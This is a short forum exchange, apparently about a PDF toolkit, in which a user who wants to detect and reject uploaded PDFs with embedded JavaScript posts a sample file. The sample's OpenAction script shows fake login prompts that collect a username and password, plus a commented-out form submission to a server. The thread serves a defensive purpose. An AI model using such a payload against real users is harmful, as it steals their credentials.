Thomas Hoevel wrote:
We don't have a sample yet.
There are quite a few place where JavaScript actions can be used, so to detect any JavaScript code, a lot of checks must be made.
Checks will be much easier if you can narrow down the list of JavaScript actions that matter for you.
Well, i'm trying to close vulnerable from stored xss in a pdf file. which is why i need to detect and reject any pdf file that have javascript embedded.
here's one of the stored xss example :
Code:
%PDF-1.7
1 0 obj
<</Type /Catalog /Pages 2 0 R /OpenAction 3 0 R>>
endobj
2 0 obj
<</Type /Pages /Kids [4 0 R] /Count 1>>
endobj
3 0 obj
<</Type /Action /S /JavaScript /JS (
var user = app.response({
cQuestion: 'Enter your username',
cTitle: 'Login Required',
bPassword: false,
cLabel: 'Username:'
});
var pass = app.response({
cQuestion: 'Enter your password',
cTitle: 'Login Required',
bPassword: true,
cLabel: 'Password:'
});
var userEncoded = encodeURIComponent(user);
var passEncoded = encodeURIComponent(pass);
//var sendData = 'user' + encodeURIComponent(user) + '&pass' + encodeURIComponent(pass);
//this.submitForm({
// cURL: server + '?' + sendData,
//cSubmitAs: 'HTML'
//});
)>
endobj
4 0 obj
<</Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]>>
endobj
trailer
<</Root 1 0 R>>
%%EOF